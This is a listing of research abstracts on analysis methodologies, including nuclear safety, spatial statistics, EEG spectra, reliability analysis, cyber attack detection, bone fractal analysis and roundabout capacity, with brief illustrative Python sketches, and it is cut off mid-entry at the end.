    Since the Fukushima-Daiichi nuclear power station accident, the Japanese regulatory body has improved and upgraded the regulation of nuclear power plants, and continuous effort is required to enhance risk management in the mid- to long term. Earthquakes and tsunamis are considered as the most important risks, and the establishment of probabilistic risk assessment (PRA) methodologies for these events is a major issue of current PRA. The Nuclear Regulation Authority (NRA) addressed the PRA methodology for tsunamis induced by earthquakes, which is one of the methodologies that should be enhanced step by step for the improvement and maturity of PRA techniques. The AESJ standard for the procedure of seismic PRA for nuclear power plants in 2015 provides the basic concept of the methodology; however, details of the application to the actual plant PRA model have not been sufficiently provided. This study proposes a detailed PRA methodology for tsunamis induced by earthquakes using the DQFM methodology, which contributes to improving the safety of nuclear power plants. Furthermore, this study also states the issues which need more research. (author)

  11. Application of transient analysis methodology to heat exchanger performance monitoring

    International Nuclear Information System (INIS)

    Rampall, I.; Soler, A.I.; Singh, K.P.; Scott, B.H.

    1994-01-01

    A transient testing technique is developed to evaluate the thermal performance of industrial scale heat exchangers. A Galerkin-based numerical method with a choice of spectral basis elements to account for spatial temperature variations in heat exchangers is developed to solve the transient heat exchanger model equations. Testing a heat exchanger in the transient state may be the only viable alternative where conventional steady state testing procedures are impossible or infeasible. For example, this methodology is particularly suited to the determination of fouling levels in component cooling water system heat exchangers in nuclear power plants. The heat load on these so-called component coolers under steady state conditions is too small to permit meaningful testing. An adequate heat load develops immediately after a reactor shutdown when the exchanger inlet temperatures are highly time-dependent. The application of the analysis methodology is illustrated herein with reference to an in-situ transient testing carried out at a nuclear power plant. The method, however, is applicable to any transient testing application
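
    The essence of transient testing is that heat exchanger parameters are inferred by matching a transient model to time-dependent temperature measurements. The sketch below replaces the paper's Galerkin spectral model with a heavily simplified lumped single-node energy balance and recovers an assumed overall conductance UA from synthetic noisy outlet temperatures; all plant numbers are invented.

```python
import numpy as np

rng = np.random.default_rng(5)

def simulate_outlet_temperature(ua, t, hot_side_temp,
                                t_cold_in=30.0, m_dot_cp=4.0e4, capacity=2.0e6):
    """Lumped single-node energy balance for the cold-side outlet temperature (deg C).

    capacity * dT/dt = m_dot_cp * (t_cold_in - T) + ua * (hot_side_temp - T)
    Explicit Euler integration; a heavily simplified stand-in for the paper's
    Galerkin spectral model.
    """
    temps = np.empty_like(t)
    temps[0] = t_cold_in
    for i in range(1, t.size):
        dt = t[i] - t[i - 1]
        heat_in = (m_dot_cp * (t_cold_in - temps[i - 1])
                   + ua * (hot_side_temp[i - 1] - temps[i - 1]))
        temps[i] = temps[i - 1] + dt * heat_in / capacity
    return temps

# Transient test: hot-side temperature decays after shutdown (illustrative numbers).
time = np.linspace(0.0, 3600.0, 721)                       # 1 h, 5 s steps
hot_temp = 40.0 + 45.0 * np.exp(-time / 1200.0)

# "Measured" outlet temperatures generated with a true UA of 3.0e4 W/K plus noise.
measured = simulate_outlet_temperature(3.0e4, time, hot_temp) + rng.normal(0.0, 0.2, time.size)

# Estimate UA by scanning candidate values and minimizing the sum of squared errors.
candidates = np.linspace(1.0e4, 6.0e4, 251)
errors = [np.sum((simulate_outlet_temperature(ua, time, hot_temp) - measured) ** 2)
          for ua in candidates]
print(f"estimated UA = {candidates[np.argmin(errors)]:.0f} W/K (true value 30000 W/K)")
```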

  12. Methodology to analysis of aging processes of containment spray system

    International Nuclear Information System (INIS)

    Borges, D. da Silva; Lava, D.D.; Moreira, M. de L.; Ferreira Guimarães, A.C.; Fernandes da Silva, L.

    2015-01-01

    This paper presents a contribution to the study of the aging process of components in commercial Pressurized Water Reactor (PWR) plants. The motivation for writing this work emerged from the current nuclear outlook. Numerous nuclear power plants worldwide have reached an advanced operating age. This situation requires a process to ensure the reliability of the operating systems of these plants; because of this, methodologies capable of estimating the failure probability of components and systems are necessary. In addition to the safety factors involved, such methodologies can be used to search for ways to extend the life cycle of nuclear plants, which will otherwise undergo the decommissioning process after an operating time of 40 years. Decommissioning negatively affects power generation and demands an enormous investment. Thus, this paper aims to present modeling and sensitivity analysis techniques which together can generate an estimate of how the components that are most sensitive to the aging process will behave during the normal operation cycle of a nuclear power plant. (authors)

  13. A new methodology of spatial cross-correlation analysis.

    Science.gov (United States)

    Chen, Yanguang

    2015-01-01

    Spatial correlation modeling comprises both spatial autocorrelation and spatial cross-correlation processes. The spatial autocorrelation theory has been well-developed. It is necessary to advance the method of spatial cross-correlation analysis to supplement the autocorrelation analysis. This paper presents a set of models and analytical procedures for spatial cross-correlation analysis. By analogy with Moran's index newly expressed in a spatial quadratic form, a theoretical framework is derived for geographical cross-correlation modeling. First, two sets of spatial cross-correlation coefficients are defined, including a global spatial cross-correlation coefficient and local spatial cross-correlation coefficients. Second, a pair of scatterplots of spatial cross-correlation is proposed, and the plots can be used to visually reveal the causality behind spatial systems. Based on the global cross-correlation coefficient, Pearson's correlation coefficient can be decomposed into two parts: direct correlation (partial correlation) and indirect correlation (spatial cross-correlation). As an example, the methodology is applied to the relationships between China's urbanization and economic development to illustrate how to model spatial cross-correlation phenomena. This study is an introduction to developing the theory of spatial cross-correlation, and future geographical spatial analysis might benefit from these models and indexes.

  14. A New Methodology of Spatial Cross-Correlation Analysis

    Science.gov (United States)

    Chen, Yanguang

    2015-01-01

    Spatial correlation modeling comprises both spatial autocorrelation and spatial cross-correlation processes. The spatial autocorrelation theory has been well-developed. It is necessary to advance the method of spatial cross-correlation analysis to supplement the autocorrelation analysis. This paper presents a set of models and analytical procedures for spatial cross-correlation analysis. By analogy with Moran’s index newly expressed in a spatial quadratic form, a theoretical framework is derived for geographical cross-correlation modeling. First, two sets of spatial cross-correlation coefficients are defined, including a global spatial cross-correlation coefficient and local spatial cross-correlation coefficients. Second, a pair of scatterplots of spatial cross-correlation is proposed, and the plots can be used to visually reveal the causality behind spatial systems. Based on the global cross-correlation coefficient, Pearson’s correlation coefficient can be decomposed into two parts: direct correlation (partial correlation) and indirect correlation (spatial cross-correlation). As an example, the methodology is applied to the relationships between China’s urbanization and economic development to illustrate how to model spatial cross-correlation phenomena. This study is an introduction to developing the theory of spatial cross-correlation, and future geographical spatial analysis might benefit from these models and indexes. PMID:25993120

  15. Using of BEPU methodology in a final safety analysis report

    International Nuclear Information System (INIS)

    Menzel, Francine; Sabundjian, Gaiane; D'auria, Francesco; Madeira, Alzira A.

    2015-01-01

    The Nuclear Reactor Safety (NRS) has been established since the discovery of nuclear fission, and the occurrence of accidents in nuclear power plants worldwide has contributed to its improvement. The Final Safety Analysis Report (FSAR) must contain complete information concerning the safety of the plant and the plant site, and must be seen as a compendium of NRS. The FSAR integrates both the licensing requirements and the analytical techniques. The analytical techniques can be applied using a realistic approach that addresses the uncertainties of the results. This work aims to give an overview of the main analytical techniques that can be applied with a Best Estimate Plus Uncertainty (BEPU) methodology, which is 'the best one can do', as well as the ALARA (As Low As Reasonably Achievable) principle. Moreover, the paper presents the background of the licensing process through the main licensing requirements. (author)

  16. Using of BEPU methodology in a final safety analysis report

    Energy Technology Data Exchange (ETDEWEB)

    Menzel, Francine; Sabundjian, Gaiane, E-mail: fmenzel@ipen.br, E-mail: gdjian@ipen.br [Instituto de Pesquisas Energeticas e Nucleares (IPEN/CNEN-SP), Sao Paulo, SP (Brazil); D'auria, Francesco, E-mail: f.dauria@ing.unipi.it [Universita degli Studi di Pisa, Gruppo di Ricerca Nucleare San Piero a Grado (GRNSPG), Pisa (Italy); Madeira, Alzira A., E-mail: alzira@cnen.gov.br [Comissao Nacional de Energia Nuclear (CNEN), Rio de Janeiro, RJ (Brazil)

    2015-07-01

    The Nuclear Reactor Safety (NRS) has been established since the discovery of nuclear fission, and the occurrence of accidents in nuclear power plants worldwide has contributed to its improvement. The Final Safety Analysis Report (FSAR) must contain complete information concerning the safety of the plant and the plant site, and must be seen as a compendium of NRS. The FSAR integrates both the licensing requirements and the analytical techniques. The analytical techniques can be applied using a realistic approach that addresses the uncertainties of the results. This work aims to give an overview of the main analytical techniques that can be applied with a Best Estimate Plus Uncertainty (BEPU) methodology, which is 'the best one can do', as well as the ALARA (As Low As Reasonably Achievable) principle. Moreover, the paper presents the background of the licensing process through the main licensing requirements. (author)

  17. Methodology for Modeling and Analysis of Business Processes (MMABP)

    Directory of Open Access Journals (Sweden)

    Vaclav Repa

    2015-10-01

    Full Text Available This paper introduces a methodology for modeling business processes. The creation of the methodology is described in terms of the Design Science Method. First, the gap in contemporary business process modeling approaches is identified and general modeling principles which can fill the gap are discussed. The way in which these principles have been implemented in the main features of the created methodology is then described. The most critical identified points of business process modeling are process states, process hierarchy, and the granularity of process description. The methodology has been evaluated through use in a real project. Using examples from this project, the main methodology features are explained, together with the significant problems encountered during the project. Drawing on these problems and on the results of the methodology evaluation, the needed future development of the methodology is outlined.

  18. Application of System Dynamics Methodology in Population Analysis

    Directory of Open Access Journals (Sweden)

    August Turina

    2009-09-01

    Full Text Available The goal of this work is to present the application of system dynamics and systems thinking, as well as the advantages and possible defects of this analytic approach, in order to improve the analysis of complex systems such as populations and, thereby, to monitor more effectively the underlying causes of migrations. This methodology has long been present in interdisciplinary scientific circles, but its scientific contribution has not been sufficiently applied in analysis practice in Croatia. Namely, the major part of system analysis is focused on detailed complexity rather than on dynamic complexity. Generally, the science of complexity deals with emergence, innovation, learning and adaptation. Complexity is viewed according to the number of system components, or through the number of combinations that must be continually analyzed in order to understand the system and, consequently, make adequate decisions. Simulations containing thousands of variables and complex arrays of details distract overall attention from the basic cause patterns and key inter-relations emerging and prevailing within an analyzed population. Systems thinking offers a holistic and integral perspective for observation of the world.

  19. Transuranium analysis methodologies for biological and environmental samples

    International Nuclear Information System (INIS)

    Wessman, R.A.; Lee, K.D.; Curry, B.; Leventhal, L.

    1978-01-01

    Analytical procedures for the most abundant transuranium nuclides in the environment (i.e., plutonium and, to a lesser extent, americium) are available. There is a lack of procedures for doing sequential analysis for Np, Pu, Am, and Cm in environmental samples, primarily because of current emphasis on Pu and Am. Reprocessing requirements and waste disposal connected with the fuel cycle indicate that neptunium and curium must be considered in environmental radioactive assessments. Therefore it was necessary to develop procedures that determine all four of these radionuclides in the environment. The state of the art of transuranium analysis methodology as applied to environmental samples is discussed relative to different sample sources, such as soil, vegetation, air, water, and animals. Isotope-dilution analysis with ²⁴³Am (²³⁹Np) and ²³⁶Pu or ²⁴²Pu radionuclide tracers is used. Americium and curium are analyzed as a group, with ²⁴³Am as the tracer. Sequential extraction procedures employing bis(2-ethyl-hexyl)orthophosphoric acid (HDEHP) were found to result in lower yields and higher Am--Cm fractionation than ion-exchange methods.

  20. Methodology for the analysis and retirement of assets: Power transformers

    Directory of Open Access Journals (Sweden)

    Gustavo Adolfo Gómez-Ramírez

    2015-09-01

    Full Text Available This article develops a high-voltage engineering methodology for the analysis and retirement of repaired power transformers, based on engineering criteria, in order to correlate the condition of the transformer from several points of view: electrical, mechanical, dielectric and thermal. A review of the state of the art reveals two situations of great significance. First, the international procedures are a “guide” for the acceptance of new transformers, so they cannot be applied literally to repaired transformers, given the degradation the transformer has suffered over the years and all the factors that led to a possible repair. Second, building on the most recent technical literature, articles analyzing the dielectric oil and the paper have been reviewed, in which correlations are established between the quality of the insulating paper and the furan concentrations in the oil. Finally, most of the research carried out to date has focused on analyzing the transformer from the condition of its dielectric oil, so in most cases it has not been possible to perform forensic engineering inside an in-service transformer and thereby analyze the design components that can compromise its integrity and operability.

  1. [Compressive-spectral analysis of EEG in patients with panic attacks in the context of different psychiatric diseases].

    Science.gov (United States)

    Tuter, N V; Gnezditskiĭ, V V

    2008-01-01

    Panic disorders (PD) which develop in the context of different psychiatric diseases (neurotic, personality disorder and schizotypal disorders) have their own clinical and neurophysiological features. The results of compressive-spectral analysis of the EEG (CSA EEG) in patients with panic attacks differed depending on the initial psychiatric status. EEG parameters in patients differed from those in controls. The common feature for all PD patients was a lower spectral density of the theta, alpha and beta bands, as well as a lower total spectral density, without any alteration of the regional distribution. A decrease in the electrical activity of activation systems was found in the groups with neurotic and schizotypal disorders, and of inhibition systems in the group with schizotypal disorders. The EEG results did not suggest any depression of activation systems in patients with specific personality disorders. The data obtained with CSA EEG mirror the integrative brain activity that determines both the appearance of panic attacks and the nosology of the psychiatric disease.
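
    As a generic illustration of band-wise spectral density estimation of the kind underlying CSA EEG, the sketch below computes theta, alpha, and beta band power from a synthetic signal with Welch's method. The sampling rate, band limits, and test signal are assumed; the clinical pipeline of the study is not reproduced.

```python
# Minimal sketch of per-band spectral density from an EEG channel using Welch's
# method. Band boundaries, sampling rate, and the synthetic signal are assumed
# for illustration; the study's CSA EEG pipeline is not reproduced here.
import numpy as np
from scipy.signal import welch

fs = 256.0                                    # sampling rate in Hz (assumed)
rng = np.random.default_rng(0)
t = np.arange(0, 30.0, 1.0 / fs)
eeg = np.sin(2 * np.pi * 10 * t) + 0.5 * rng.standard_normal(t.size)  # toy signal

freqs, psd = welch(eeg, fs=fs, nperseg=int(4 * fs))   # spectral density

bands = {"theta": (4, 8), "alpha": (8, 13), "beta": (13, 30)}
for name, (lo, hi) in bands.items():
    mask = (freqs >= lo) & (freqs < hi)
    power = np.trapz(psd[mask], freqs[mask])  # integrate PSD over the band
    print(f"{name:6s} band power: {power:.3f}")
print(f"total spectral power: {np.trapz(psd, freqs):.3f}")
```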

  2. Failure mode effect analysis and fault tree analysis as a combined methodology in risk management

    Science.gov (United States)

    Wessiani, N. A.; Yoshio, F.

    2018-04-01

    Many studies have reported the implementation of Failure Mode Effect Analysis (FMEA) and Fault Tree Analysis (FTA) as methods in risk management. However, most of these studies choose only one of the two methods in their risk management methodology. On the other hand, combining the two methods reduces the drawbacks of each method when implemented separately. This paper aims to combine the FMEA and FTA methodologies for assessing risk. A case study in a metal company illustrates how this combined methodology can be implemented. In the case study, the combined methodology assesses the internal risks that occur in the production process. Those internal risks should then be mitigated based on their level of risk.
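
    A minimal sketch of the two halves of such a combined workflow is given below: failure modes are ranked by Risk Priority Number (the FMEA side) and a fault-tree top event is quantified from basic-event probabilities (the FTA side). The failure modes, ratings, probabilities, and gate structure are invented for illustration and are not the case-study data.

```python
# Minimal sketch of a combined FMEA/FTA workflow: rank failure modes by Risk
# Priority Number (severity x occurrence x detection), then estimate a fault-tree
# top-event probability from basic-event probabilities. All failure modes and
# numbers are invented for illustration; they are not the metal-company case data.
failure_modes = [
    # (name, severity, occurrence, detection, basic-event probability)
    ("furnace overheating",  8, 3, 4, 0.02),
    ("conveyor jam",         5, 6, 2, 0.05),
    ("coolant pump failure", 9, 2, 5, 0.01),
]

# FMEA part: Risk Priority Number ranking.
ranked = sorted(failure_modes, key=lambda m: m[1] * m[2] * m[3], reverse=True)
for name, s, o, d, _ in ranked:
    print(f"{name:22s} RPN = {s * o * d}")

# FTA part: top event = (pump failure AND furnace overheating) OR conveyor jam,
# assuming independent basic events (assumed gate structure).
p = {name: prob for name, *_, prob in failure_modes}
p_and = p["coolant pump failure"] * p["furnace overheating"]
p_top = 1.0 - (1.0 - p_and) * (1.0 - p["conveyor jam"])
print(f"top-event probability ~ {p_top:.4f}")
```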

  3. Supporting Space Systems Design via Systems Dependency Analysis Methodology

    Science.gov (United States)

    Guariniello, Cesare

    assess the behavior of each system based on its internal status and on the topology of its dependencies on systems connected to it. Designers and decision makers can therefore quickly analyze and explore the behavior of complex systems and evaluate different architectures under various working conditions. The methods support educated decision making both in the design and in the update process of systems architecture, reducing the need to execute extensive simulations. In particular, in the phase of concept generation and selection, the information given by the methods can be used to identify promising architectures to be further tested and improved, while discarding architectures that do not show the required level of global features. The methods, when used in conjunction with appropriate metrics, also allow for improved reliability and risk analysis, as well as for automatic scheduling and re-scheduling based on the features of the dependencies and on the accepted level of risk. This dissertation illustrates the use of the two methods in sample aerospace applications, both in the operational and in the developmental domain. The applications show how to use the developed methodology to evaluate the impact of failures, assess the criticality of systems, quantify metrics of interest, quantify the impact of delays, support informed decision making when scheduling the development of systems and evaluate the achievement of partial capabilities. A larger, well-framed case study illustrates how the Systems Operational Dependency Analysis method and the Systems Developmental Dependency Analysis method can support analysis and decision making, at the mid and high level, in the design process of architectures for the exploration of Mars. The case study also shows how the methods do not replace the classical systems engineering methodologies, but support and improve them.

  4. Stress and psychological factors before a migraine attack: A time-based analysis

    Directory of Open Access Journals (Sweden)

    Makino Mariko

    2008-09-01

    Full Text Available Abstract Background The objective of this study is to examine the stress and mood changes of Japanese subjects over the 1–3 days before a migraine headache. Methods The study participants were 16 patients with migraines who consented to participate in this study. Each subject kept a headache diary four times a day for two weeks. They evaluated the number of stressful events, daily hassles, domestic and non-domestic stress, anxiety, depressive tendency and irritability by visual analog scales. The days were classified into migraine days, pre-migraine days, buffer days and control days based on the intensity of the headaches and accompanying symptoms, and a comparative study was conducted for each factor on the migraine days, pre-migraine days and control days. Results The stressful event value of pre-migraine days showed no significant difference compared to other days. The daily hassle value of pre-migraine days was the highest and was significantly higher than that of buffer days. In non-domestic stress, values on migraine days were significantly higher than on other days, and there was no significant difference between pre-migraine days and buffer days or between pre-migraine days and control days. There was no significant difference in the values of domestic stress between the categories. There was little difference in sleep quality on migraine and pre-migraine days, but other psychological factors were higher on migraine days than on pre-migraine days. Conclusion Psychosocial stress preceding the onset of migraines by several days was suggested to play an important role in the occurrence of migraines. However, stress 2–3 days before a migraine attack was not so high as it has been reported to be in the United States and

  5. The analysis of RWAP(Rod Withdrawal at Power) using the KEPRI methodology

    International Nuclear Information System (INIS)

    Yang, C. K.; Kim, Y. H.

    2001-01-01

    KEPRI developed a new methodology based on RASP (Reactor Analysis Support Package). In this paper, the analysis of the RWAP (Rod Withdrawal at Power) accident, which can result in reactivity and power distribution anomalies, was performed using the KEPRI methodology. The calculation describes the RWAP transient and documents the analysis, including the computer code modeling assumptions and input parameters used in the analysis. To validate the new methodology, the results of the calculation were compared with the FSAR. The results obtained with the KEPRI methodology are similar to those of the FSAR, and the sensitivity results for the postulated parameters were similar to those of the existing methodology.

  6. Temporal Cyber Attack Detection.

    Energy Technology Data Exchange (ETDEWEB)

    Ingram, Joey Burton [Sandia National Lab. (SNL-NM), Albuquerque, NM (United States); Draelos, Timothy J. [Sandia National Lab. (SNL-NM), Albuquerque, NM (United States); Galiardi, Meghan [Sandia National Lab. (SNL-NM), Albuquerque, NM (United States); Doak, Justin E. [Sandia National Lab. (SNL-NM), Albuquerque, NM (United States)

    2017-11-01

    Rigorous characterization of the performance and generalization ability of cyber defense systems is extremely difficult, making it hard to gauge uncertainty, and thus, confidence. This difficulty largely stems from a lack of labeled attack data that fully explores the potential adversarial space. Currently, performance of cyber defense systems is typically evaluated in a qualitative manner by manually inspecting the results of the system on live data and adjusting as needed. Additionally, machine learning has shown promise in deriving models that automatically learn indicators of compromise that are more robust than analyst-derived detectors. However, to generate these models, most algorithms require large amounts of labeled data (i.e., examples of attacks). Algorithms that do not require annotated data to derive models are similarly at a disadvantage, because labeled data is still necessary when evaluating performance. In this work, we explore the use of temporal generative models to learn cyber attack graph representations and automatically generate data for experimentation and evaluation. Training and evaluating cyber systems and machine learning models requires significant, annotated data, which is typically collected and labeled by hand for one-off experiments. Automatically generating such data helps derive/evaluate detection models and ensures reproducibility of results. Experimentally, we demonstrate the efficacy of generative sequence analysis techniques on learning the structure of attack graphs, based on a realistic example. These derived models can then be used to generate more data. Additionally, we provide a roadmap for future research efforts in this area.
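
    As a toy illustration of a temporal generative model for attack sequences, the sketch below fits a first-order Markov chain to a few hand-written attack-step sequences and samples synthetic ones. The report's actual model classes and data are not reproduced; the training sequences are invented.

```python
# Sketch of a first-order Markov chain as a simple temporal generative model for
# attack-step sequences: fit transition probabilities from observed sequences,
# then sample new synthetic sequences. The report's models may be more elaborate;
# the training sequences here are invented for illustration.
import random
from collections import defaultdict

train = [
    ["recon", "exploit", "install", "c2", "exfiltrate"],
    ["recon", "phish", "install", "c2", "lateral", "exfiltrate"],
    ["recon", "exploit", "install", "lateral", "c2", "exfiltrate"],
]

# Count transitions, including start and end markers.
counts = defaultdict(lambda: defaultdict(int))
for seq in train:
    steps = ["<start>"] + seq + ["<end>"]
    for a, b in zip(steps, steps[1:]):
        counts[a][b] += 1

def sample(rng=random.Random(0), max_len=20):
    """Sample one synthetic attack sequence from the fitted chain."""
    state, out = "<start>", []
    while len(out) < max_len:
        nxt = counts[state]
        state = rng.choices(list(nxt), weights=list(nxt.values()))[0]
        if state == "<end>":
            break
        out.append(state)
    return out

for _ in range(3):
    print(sample())
```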

  7. Reliability analysis for power supply system in a reprocessing facility based on GO methodology

    International Nuclear Information System (INIS)

    Wang Renze

    2014-01-01

    The GO methodology was applied to analyze the reliability of the power supply system in a typical reprocessing facility. Because tie breakers are installed in the system, a tie breaker operator was defined. GO methodology modeling and quantitative analysis were then performed sequentially, and the minimal cut sets and average unavailability of the system were obtained. A parallel analysis with the fault tree methodology was also performed. The results showed that the arrangement of the tie breakers was rational and necessary, and that, compared with the fault tree methodology, the GO methodology made the modeling much easier and the chart much more succinct for analyzing the reliability of the power supply system. (author)
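
    The GO chart evaluation itself is not reproduced here; the sketch below only illustrates the final quantification step mentioned above, estimating average system unavailability from minimal cut sets with the rare-event approximation. The cut sets and component unavailabilities are assumed for illustration.

```python
# Generic sketch of estimating average system unavailability from minimal cut
# sets using the rare-event approximation (sum of cut-set products). This is not
# the GO-methodology chart evaluation itself; cut sets and component
# unavailabilities are invented for illustration.
from math import prod

# Component average unavailabilities (assumed values).
q = {"offsite_line_A": 1e-3, "offsite_line_B": 1e-3,
     "diesel_gen": 5e-3, "tie_breaker": 2e-4}

# Minimal cut sets of the power-supply function (assumed structure).
cut_sets = [
    {"offsite_line_A", "offsite_line_B", "diesel_gen"},
    {"offsite_line_A", "tie_breaker"},
]

Q_sys = sum(prod(q[c] for c in cs) for cs in cut_sets)  # rare-event approximation
print(f"approximate system unavailability: {Q_sys:.2e}")
```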

  8. Development of Human Performance Analysis and Advanced HRA Methodology

    Energy Technology Data Exchange (ETDEWEB)

    Jung, Won Dea; Park, Jin Kyun; Kim, Jae Whan; Kim, Seong Whan; Kim, Man Cheol; Ha, Je Joo

    2007-06-15

    The purpose of this project is to build a systematic framework that can evaluate the effect of human factors-related problems on the safety of nuclear power plants (NPPs) as well as develop a technology that can be used to enhance human performance. The research goal of this project is twofold: (1) the development of a human performance database and a framework to enhance human performance, and (2) the analysis of human error together with the construction of a technical basis for human reliability analysis. There are three main results of this study. The first is the development of a human performance database, called OPERA-I/II (Operator Performance and Reliability Analysis, Part I and Part II). In addition, a standard communication protocol was developed based on OPERA to reduce human error caused by communication errors in the phase of event diagnosis. The task complexity (TACOM) measure and the methodology of optimizing diagnosis procedures were also finalized during this research phase. The second main result is the development of a software tool, K-HRA, which supports the standard HRA method. Finally, an advanced HRA method named AGAPE-ET was developed by combining the MDTA (misdiagnosis tree analysis) technique and K-HRA, which can be used to analyze errors of commission (EOC) and errors of omission (EOO). These research results, such as OPERA-I/II, TACOM, the standard communication protocol, and the K-HRA and AGAPE-ET methods, will be used to improve the quality of HRA and to enhance human performance in nuclear power plants.

  9. Development of Human Performance Analysis and Advanced HRA Methodology

    International Nuclear Information System (INIS)

    Jung, Won Dea; Park, Jin Kyun; Kim, Jae Whan; Kim, Seong Whan; Kim, Man Cheol; Ha, Je Joo

    2007-06-01

    The purpose of this project is to build a systematic framework that can evaluate the effect of human factors-related problems on the safety of nuclear power plants (NPPs) as well as develop a technology that can be used to enhance human performance. The research goal of this project is twofold: (1) the development of a human performance database and a framework to enhance human performance, and (2) the analysis of human error together with the construction of a technical basis for human reliability analysis. There are three main results of this study. The first is the development of a human performance database, called OPERA-I/II (Operator Performance and Reliability Analysis, Part I and Part II). In addition, a standard communication protocol was developed based on OPERA to reduce human error caused by communication errors in the phase of event diagnosis. The task complexity (TACOM) measure and the methodology of optimizing diagnosis procedures were also finalized during this research phase. The second main result is the development of a software tool, K-HRA, which supports the standard HRA method. Finally, an advanced HRA method named AGAPE-ET was developed by combining the MDTA (misdiagnosis tree analysis) technique and K-HRA, which can be used to analyze errors of commission (EOC) and errors of omission (EOO). These research results, such as OPERA-I/II, TACOM, the standard communication protocol, and the K-HRA and AGAPE-ET methods, will be used to improve the quality of HRA and to enhance human performance in nuclear power plants.

  10. FRACTAL ANALYSIS OF TRABECULAR BONE: A STANDARDISED METHODOLOGY

    Directory of Open Access Journals (Sweden)

    Ian Parkinson

    2011-05-01

    Full Text Available A standardised methodology for the fractal analysis of histological sections of trabecular bone has been established. A modified box counting method has been developed for use on a PC-based image analyser (Quantimet 500MC, Leica Cambridge). The effect of image analyser settings, magnification, image orientation and threshold levels was determined. Also, the range of scale over which trabecular bone is effectively fractal was determined and a method formulated to objectively calculate more than one fractal dimension from the modified Richardson plot. The results show that magnification, image orientation and threshold settings have little effect on the estimate of fractal dimension. Trabecular bone has a lower limit below which it is not fractal (λ<25 μm) and the upper limit is 4250 μm. There are three distinct fractal dimensions for trabecular bone (sectional fractals), with magnitudes greater than 1.0 and less than 2.0. It has been shown that trabecular bone is effectively fractal over a defined range of scale. Also, within this range, there is more than one fractal dimension, describing spatial structural entities. Fractal analysis is a model-independent method for describing a complex multifaceted structure, which can be adapted for the study of other biological systems. This may be at the cell, tissue or organ level and complements conventional histomorphometric and stereological techniques.
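
    A minimal box-counting sketch in the spirit of the method described above is given below: occupied boxes are counted at several box sizes and the fractal dimension is taken as the slope of log N(s) against log(1/s). The threshold choice, restricted scale range, and instrument-specific modifications of the paper are not reproduced, and the test image is synthetic.

```python
# Minimal box-counting sketch for a binary (thresholded) section image: count
# occupied boxes at several box sizes and take the fractal dimension as the slope
# of log N(s) versus log(1/s). The paper's modified method, threshold choice,
# and restricted scale range are not reproduced; the test image is synthetic.
import numpy as np

def box_count(img, size):
    """Number of size x size boxes containing at least one foreground pixel."""
    h, w = img.shape
    count = 0
    for i in range(0, h, size):
        for j in range(0, w, size):
            if img[i:i + size, j:j + size].any():
                count += 1
    return count

def fractal_dimension(img, sizes=(2, 4, 8, 16, 32)):
    counts = [box_count(img, s) for s in sizes]
    slope, _ = np.polyfit(np.log(1.0 / np.asarray(sizes)), np.log(counts), 1)
    return slope

# Synthetic binary image for demonstration only.
rng = np.random.default_rng(1)
img = rng.random((256, 256)) > 0.7
print(f"estimated box-counting dimension: {fractal_dimension(img):.2f}")
```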

  11. Methodological frontier in operational analysis for roundabouts: a review

    Directory of Open Access Journals (Sweden)

    Orazio Giuffre'

    2016-11-01

    Full Text Available Several studies have shown that modern roundabouts are safe and effective engineering countermeasures for traffic calming, and they are now widely used worldwide. The increasing use of roundabouts and, more recently, of turbo and flower roundabouts has produced a great variety of experience in the fields of intersection design, traffic safety and capacity modelling. As with unsignalized intersections, which represent the starting point for extending operational analysis to roundabouts, the general situation in capacity estimation is still characterized by the debate between gap acceptance models and empirical regression models. However, capacity modelling must contain both the analytical construction and solution of the model and the implementation of driver behavior. Thus, issues concerning realistic modelling of driver behavior through the parameters included in the models are always of interest for practitioners and analysts in transportation and road infrastructure engineering. Based on these considerations, this paper presents a literature review of the key methodological issues in the operational analysis of modern roundabouts. Focus is placed on the aspects associated with gap acceptance behavior, the derivation of the analytically based models and the calculation of the parameters included in the capacity equations, as well as steady state and non-steady state conditions and uncertainty in entry capacity estimation. Finally, insights into future developments of research in this field are also outlined.
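
    As an example of the analytical gap-acceptance family discussed in the review, the sketch below evaluates Siegloch's exponential entry-capacity formula for a few circulating flows. The critical gap and follow-up time values are assumed, and this is an illustration of the model family rather than a result of the paper.

```python
# One widely used gap-acceptance entry-capacity model is Siegloch's exponential
# formula, shown here as an illustration of the analytical family discussed in
# the review. Critical gap, follow-up time, and circulating flows are assumed
# values, not results from the paper.
import math

def siegloch_capacity(q_c, t_c, t_f):
    """Entry capacity (veh/h) given circulating flow q_c (veh/h),
    critical gap t_c (s) and follow-up time t_f (s)."""
    t0 = t_c - t_f / 2.0
    return (3600.0 / t_f) * math.exp(-q_c * t0 / 3600.0)

for q_c in (200, 600, 1000):                 # circulating flow, veh/h (assumed)
    cap = siegloch_capacity(q_c, t_c=4.1, t_f=2.9)
    print(f"circulating {q_c:4d} veh/h -> entry capacity ~ {cap:5.0f} veh/h")
```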

  12. Heart Attack Recovery FAQs

    Science.gov (United States)

    ... recommendations to make a full recovery. View an animation of a heart attack.

  13. 50 Years of coastal erosion analysis: A new methodological approach.

    Science.gov (United States)

    Prieto Campos, Antonio; Diaz Cuevas, Pilar; Ojeda zujar, Jose; Guisado-Pintado, Emilia

    2017-04-01

    Coasts around the world have been subjected to increased anthropogenic pressures which, combined with natural hazard impacts (storm events, rising sea levels), have led to severe erosion problems with negative impacts on the economy and the safety of coastal communities. The Andalusian coast (South Spain) is a renowned global tourist destination. In the past decades a deep transformation in the economic model led to significant land use changes: strong regulation of rivers, urbanisation and occupation of dunes, among others. As a result, irreversible transformations of the coastline caused by aggressive urbanisation now have to be faced by local authorities and are suffered by locals and visitors. Moreover, the expected impacts of climate change, aggravated by anthropic activities, emphasise the need for tools that facilitate decision making for sustainable coastal management. In this contribution a homogeneous (only one proxy and one photointerpreter) methodology is proposed for the calculation of coastal erosion rates of exposed beaches in Andalusia (640 km) through the use of detailed series (1:2500) of open source orthophotographs for the period 1956-1977-2001-2011. The combination of the traditional DSAS software (Digital Shoreline Analysis System) with a spatial database (PostgreSQL) that integrates the resulting erosion rates with related coastal thematic information (geomorphology, presence of engineering infrastructures, dunes and ecosystems) enhances the capacity for analysis and exploitation. Further, the homogeneity of the method allows the comparison of results among years on a highly diverse coast, with both Mediterranean and Atlantic façades. The novel development and integration of a PostgreSQL/PostGIS database facilitates the exploitation of the results by the user (for instance by relating calculated rates with other thematic information such as the geomorphology of the coast or the presence of a dune field on
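
    The study's DSAS/PostGIS workflow is not reproduced here. As a minimal illustration of the simplest DSAS-style change metric, the sketch below computes an end point rate (distance change along a transect divided by elapsed time) for invented transect data.

```python
# The simplest DSAS-style shoreline change metric is the end point rate (EPR):
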